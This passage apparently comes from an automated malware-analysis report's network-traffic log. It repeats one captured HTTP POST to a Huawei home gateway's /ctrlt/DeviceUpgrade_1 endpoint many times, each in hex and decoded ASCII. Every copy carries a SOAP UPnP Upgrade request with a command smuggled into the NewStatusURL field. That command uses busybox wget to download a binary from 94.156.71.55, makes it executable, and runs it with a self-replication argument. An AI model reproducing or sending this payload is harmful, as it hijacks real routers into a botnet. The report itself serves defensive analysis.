24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo 